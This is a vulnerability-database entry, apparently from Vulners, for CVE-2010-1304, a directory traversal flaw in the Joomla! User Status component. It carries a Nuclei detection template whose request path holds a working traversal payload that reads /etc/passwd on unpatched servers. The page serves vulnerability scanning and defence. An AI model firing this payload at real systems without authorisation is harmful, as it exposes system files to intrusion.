Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2010-1304
HistoryAug 29, 2021 - 10:21 a.m.

Joomla! Component User Status - Local File Inclusion

2021-08-2910:21:24
ProjectDiscovery
github.com
2

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.6 Medium

AI Score

Confidence

High

0.004 Low

EPSS

Percentile

75.3%

JSON

A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1304

info:
  name: Joomla! Component User Status - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/11998
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1304
    - http://www.exploit-db.com/exploits/11998
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/57483
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-1304
    cwe-id: CWE-22
    epss-score: 0.0045
    epss-percentile: 0.74575
    cpe: cpe:2.3:a:joomlamo:com_userstatus:1.21.16:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joomlamo
    product: com_userstatus
  tags: cve,cve2010,joomla,lfi,status,edb,joomlamo

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d3cb43212c8a3df17ee31855688e3d652f5314ee4124a7bd521c42f1982d460502201239ce976e80c6e0076a2883ce41cb8bd687c8176e3c5073b2239895d476ebdb:922c64590222798bb761d5b6d8e72950

Related

prion 1
nvd 1
cve 1
cvelist 1
nessus 1
prion
prion
Directory traversal
2010-04-08 16:30:00
nvd
nvd
CVE-2010-1304
2010-04-08 16:30:00
cve
cve
CVE-2010-1304
2010-04-08 16:30:00
cvelist
cvelist
CVE-2010-1304
2010-04-08 16:00:00
nessus
nessus
Joomla! / Mambo Component Multiple Parameter Local File Include Vulnerabilities
2010-01-04 00:00:00

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.6 Medium

AI Score

Confidence

High

0.004 Low

EPSS

Percentile

75.3%

JSON
Related for NUCLEI:CVE-2010-1304
prion1nvd1cve1cvelist1nessus1